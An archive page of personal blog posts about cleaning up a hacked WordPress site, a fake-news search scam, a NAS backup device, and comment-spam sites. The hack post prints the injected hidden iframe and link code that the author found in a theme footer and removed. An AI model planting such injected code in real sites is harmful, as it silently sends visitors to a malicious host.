Tag Archive: SQL

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

Site Outage

Strangely post on September 7th, 2011
Posted in Internet Tags: , , , , , , , , , , , , ,

My host, Site5.com, has kindly told me that this site (and others of mine) will be off-line from tonight for 3 hours from 07 Sep 2011 23:00 GMT/UTC until 08 Sep 2011 02:00 GMT/UTC.  (I’ve had to convert this from the email which is CDT specific…)

This is due to an upgrade of the MySQL databases to something called Percona, which is a new one on me! Checking it out, it is a custom install of MySQL, with extra management software clagged on.

Related External Links

Related Posts:

Comments are closed

Windows Defrag to News 9 Today Browser Scam

Free Windows Defragmenter Search

Take this for a scam and a half way of fixing the Google search results!

Defrag Search Results

Defrag Search Results

Today I was looking for an old defrag program, but couldn’t remember the name – so I went to Google.  That’s the screenshot on the right.

The second result looked promising.  After all, the text says,

Anyone know what is currently the best defragmenter for Windows 7 x64 64 bit, and why? Does it have any problems?

News 9 Today  (news9today.org)

News9 Today

News9 Today

Unfortunately, tehparadox.com is not all it seems.  The page actually referenced is http://tehparadox.com/forum/f85/best-defragmenter-windows-7-x64-452359/, which looks kosher enough, but it has nothing at all to do with disc defragmenters, and everything to do with get rich quick schemes!! (That is a screenshot on the left).

It’s like all the other fake news sites that we’ve seen recently, except in this case, the whole meta data of the website is built to deceive the search engines!

For instance, the title stays in the browser tabs, saying,

“Best defragmenter for Windows 7 x64 64 bit?”

The whole html source code is here.  You’ll see that the meta data bit reads:

name=”keywords” content=”Best,defragmenter,Windows,7,x64,64,bit, Best defragmenter for Windows 7 x64 64 bit?, downloads,free,resources,online,sharing,community,movies,games,720p,1080p,anime,applications,music,tv shows,e-books,comic books,discussions,warez,dvdr,rapidshare,megaupload,netload,hotfile,fileserve,filesonic”

name=”description” content=”Anyone know what is currently the best defragmenter for Windows 7 x64 64 bit, and why? Does it have any problems? Or should I just use the default one that comes with Windows 7? Thanks.”

Where Does it Point?

The links all go to

https://ssl.clickbank.net/order/restricted.html?errCode=accntstate&cbhopvendor=homejonlin

which then redirects to

http://www.home-online-jobs.org/check-positions-available/?hop=maspromo

WHOIS www.home-online-jobs.org

Well, they’re hidden of course.  You should know what I think of businesses that choose to be anonymous, but to repeat, I think they’re shite.  See ‘http://whois.domaintools.com/home-online-jobs.org for their “details”.

Noticeably, they have very peculiar name servers:

Name Server:NS1.MYHOMEWEALTHSYSTEM.COM

Name Server:NS2.MYHOMEWEALTHSYSTEM.COM

MYHOMEWEALTHSYSTEM.COM

This bunch of jokers are also hidden, see ‘http://whois.domaintools.com/myhomewealthsystem.com but they Do have an actual web page promoting much the same stuff.  This has been seriously debunked by Paul at WorkAtHomeTruth here back in March 2010.  He has more red flags than the semaphore kid going on it.

The Biggest Killer Laugh of All

News9TodaySmallPrint

News9 Today Small Print

MyHomeWealthSystem at least has a web page.

Now go back to the top and examine News9Today.  Down at the bottom of their small print, they say:

Copyright 2010 © News9Today.org All Rights Reserved.

Hmm?  A website URL.  I wonder what it looks like?

Well actually, if you can recall the CNN logos at the top of the page, like so (directly from their server):

Tehparadox

As seen on CNN? Ha Ha!

After getting the link to the header image above which is sourced from http://www.news9today.org/home-job-news/index_files/features16.jpg, I back-spaced to go back to the News9 Today page – and ended up on the tehparadox page here:  http://tehparadox.com/forum/f85/best-defragmenter-windows-7-x64-452359/

You see in the screenshot that the top advert is a “Google Is Hiring” scam advert?  Where does it go?

A. Well http://www.news9today.org/home-online-job-positions/?tid=hojab6 of course!

Conclusion

Somehow the browser has been redirected from the Google search page to the header advert from the tehparadox website.  This could be SQL injection or a bug in their server or my browser setup.

Whatever, this really stinks, and it’s a new thing to be wary about.

Related Posts:

What is the Best Backup for Windows in a Small Home or Office?

What is the Best Backup for Windows in a Small Home or Office?

Which Windows Backup?  A History.

Over the years I’ve tried many systems for backing up crucial Windows data.  Currently for small-scale backups I use the ubiquitous and almost bullet-proof flash drives, my current one tipping the scales at 8Gb.  But for major backups, as the years have passed, I’ve used;

  1. Floppy discs – 1.4Mb
  2. Iomega Zip discs – 100Mb
  3. CDRW – 650Mb
  4. DVD-R – 4.7Gb
  5. Western Digital My Book Home Edition – 1Tb

They all had their problems and limitations.  The last one looked good with Firewire, USB2, ethernet  & eSATA connections – but it overheated and broke…..

Best Windows Backup!

My current system is from Synology and is a “DS210j – Budget-friendly 2-bay NAS server for Home and Small Business”

See: http://www.synology.com/enu/products/DS210j/index.php

I can heartily recommend the thing.  It has so much gubbins within it and far exceeds my limited expectations.  I installed two green 2Tb drives from Western Digital  in mirrored RAID for security and use the auto-backup software provided as well as Windows’ own.  This is extremely relevant for the large number of hits I’ve had to this posting where a major part of the problem is the time taken to do a backup!  In my case, the 750Gb just takes a few hours to copy across the Gigabit speed ethernet that the unit can use.

Addendum June 2011: The tool is a seriously capable bit of kit and I cannot recommend it enough. Get one!

It does everything it says on the tin, and more!  The whole thing cost me about 200 quid, plus an hour of my time to install.

Even its firewall is more configurable than any router I’ve used!  It can be used as a server for FTP or the web.  It comes with software for a host of things that mimic Flikr etc but without all the privacy or security issues inherent in off-line storage.  It’ll also run with any operating system because it itself is a mini-linux installation as it is,  and includes Windows, Apple and Linux applications.
Check it out, straight from their overview page:

Build Your Entertainment Center

Download Station 2 functions as a 24×7 BitTorrent, FTP, HTTP, eMule, and NZB download center. RapidShare and RSS download are now supported.

DLNA Compliant Media Sever ensures compatibility and interoperability between Disk Station and a wide range of DLNA-certified home devices.

iTunes Server provides an easy way to share music and videos with other iTunes clients within the local network. You can create playlists with songs that match the criteria you specified, and best of all, iTunes will update these playlists automatically as you add or delete songs.

Audio Station supports music, Internet radio stations, and iPod playback with connected USB speakers. Web-streaming mode allows your music to be shared with multiple users over the Internet.

Back Up Your Precious Data

DSM 2.2 offers comprehensive solutions for you to back up data stored on Disk Station or your desktop computer to the Disk Station.

Server backup includes two alternatives: Network Backup and Local Backup. Both allow you to back up data in the shared folders and databases. Incremental backup option and flexible schedules are available. All can be easily configured with a step-by-step wizard.

Desktop backup provides Windows PC users with the Synology Data Replicator 3 for backing up desktop data, Outlook, and Outlook Express emails to their Disk Station by choosing one of the three backup modes: Immediate, Sync, and Scheduled backup, while Mac OS X users can use Apple Time Machine backup application to back up their critical data to Disk Station.

USBCopy allows you to quickly back up your data from an USB storage device such as an USB flash or USB card reader to the Disk Station with just one single touch on the front-panel Copy button.

Enrich Your Web Presence

Photo Station 3 simplifies photo, video, and blog sharing over the Internet. The flexibility of photo theme customization, blog layout arrangement, visitor’s privilege setting, RSS feed, and the dazzling 3-dimentional photo browsing with Cooliris make Photo Station 3 your state-of-the-art lifestyle sharing center on the Internet.

Web Station with built-in PHP+MySQL allows users to publish their own websites or install numerous popular open-source programs.

Access With Your iPhone/Mobile Device

The iPhone App DS audio allows Disk Station users to stream music stored on Disk Station with their iPhone/iPod® touch where Internet access is available, while DS photo allows uploading photos from the iPhone/iPod® touch to their Disk Station.

Users with a mobile device running on Windows Mobile® 6.0, iPhone OS 2.2.1 onward, or Symbian OS 9.1 can log on their Disk Station to view photos with Mobile Photo Station and read supported file formats with Mobile File Station where Internet access is available.

Eco Friendly

Eco Friendly

Synology Disk Station is designed and developed perpetually with the concept of energy saving. Compared with average PC counterparts, Synology Disk Station consumes a relatively low amount of power and has the HDDs hibernate when not in use. This not only helps to save energy but also extends the lifespan of the hard disk.

Synology Disk Station truly earns the title of “green product” because of the unique Scheduled Power On/Off feature, and the smart fan design effectively cools down the system with minimum power consumption, yet keeps the system quiet on operation.

Finally, all Synology products are produced with RoHS compliant parts and packed with recyclable packing materials. Synology recognizes its responsibility as a global citizen and is continually working to reduce the environmental impact of the products we create.

Related Posts:

Comments are closed

Pligg Comment Spam

Introduction

An unfortunate consequence of posting stuff online is that you enable your ‘work’, ‘your words of wisdom’, your ‘copyright’ or your petty scrawlings (choose which you think is the most appropriate), to the world as as such, it’s freely copyable.

My website is proudly running on WordPress sat on a standard shared hosting LAMP installation.  Millions do likewise as it’s cheap and effective and has an inbuilt SEO optimisation function that if you don’t abuse it, it actually works!

Comment spam is a pain but the various plugins and lockdowns block most of the crap.

Except last night I had two weird ones within half-an-hour of each other, that came from Pligg websites.  I’d never heard of Pligg until then, but it’s another example of CMS software.

The way that the comment spam made it as far as my filters (as most is dumped without my intervention) is that the websites seemed to do everything correctly to get proper pingbacks – except make sense!!!

Green Tea Fat Burner – Greenteafatburner.info

This one appeared against the posting  watch-out-for-the-scam-double-bluff, which is highly ironic!  It’s WHOIS entry is ‘protected’ by WhoisGuard – which is to be expected.  It came from IP 67.214.185.157

Weak Bladder Info – Weakbladder.info

This one appeared against the posting  rapidshare-wordpress-comment-spam, which is even more ironic, if anything!  It’s WHOIS entry is ‘protected’ by WhoisGuard – again to be expected.  It came from IP 209.31.180.25

Details

Both sites strip out text from websites (like mine), turn the text into postings and even apply ‘votes’ to them.  Sometimes after 3 mins!  The formulaic nature of the design is revealed by the ‘What is the ****** site all about?’ blurb down the side.    This is one, the other is almost identical.

The Weak Bladder site is a place for out community members to add resources and information that are related to Weak Bladder into one spot. We collect all of the relevent information from around the web, post it here, in the hopes that having a single resource will all us, and you, to save time when researching this topic. If you’d like to help, then register for a free membership and start contributing as an active community member.

Go for it! (not)

Postscript – later today!

Yay!  Got another.  Same blurb etc IP 76.73.41.92  This time it’s jointpainreliefs.info, and I quote;

The Joint Pain Relief site is a place where we collect information about joint pain, and how to overcome it, in one spot. We are a community dedicated to bringing you the best resources from around the web. If you’d like to join our community and help, signup! It’s free…

Perhaps I didn’t make it clear before, but the ‘joint pain reliefs’ contains everything…except…joint pain reliefs!  It appeared on my highly related (not) post Rapidshare WordPress Comment Spam.   What is it about this post that attracts the comment spammers?  Surely they’re not going for the phrase ‘Comment Spam’?.  And don’t call me surely!

Post-Postscript 9 June 2009

I’ve got another two almost identical comment spam/content scraping hits against the same post Rapidshare WordPress Comment Spam!!!  What is their game…

So I’m going to make a little list of them now.  Also, I’m starting a competition to guess the next bizarre subject matter of the Pligg based website.  My guess is eyelashmiteproblem.info, but I could be wrong …  It could be itchyarse.info or something.  It won’t be from these IP addresses though as I’ve blocked them.

So far, I have:

Website IP Address
Greenteafatburner.info 67.214.185.157
Weakbladder.info 209.31.180.25
jointpainreliefs.info 76.73.41.92
menopausereliefsite.info 67.214.185.157
toenailfungusite.info 67.214.185.157

I think it’s time I started adding a few blocks to my .htaccess file, ha ha. If you don’t know how to do this, read here.

Post-PostScript 14 June 2009

The next entry in the Pligg wall of shame came this morning from:

OnlyOutdoorRugs.info at IP 204.124.181.57   This is a US based host.  It targetted this wholly unrelated post of mine, Chatelus Malvaleix on Google Earth Tour de France Map

I’m now left wondering what to do with an Outdoor Rugs, especially when it rains!  The world has gone mad.  Rugs for outside has to be the height of decadence – unless they are normal rugs that you take outside to sit on. But then they’d be indoor rugs. So outdoor rugs must be for dry countries where it never rains.  My brain hurts.

Related Posts:

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me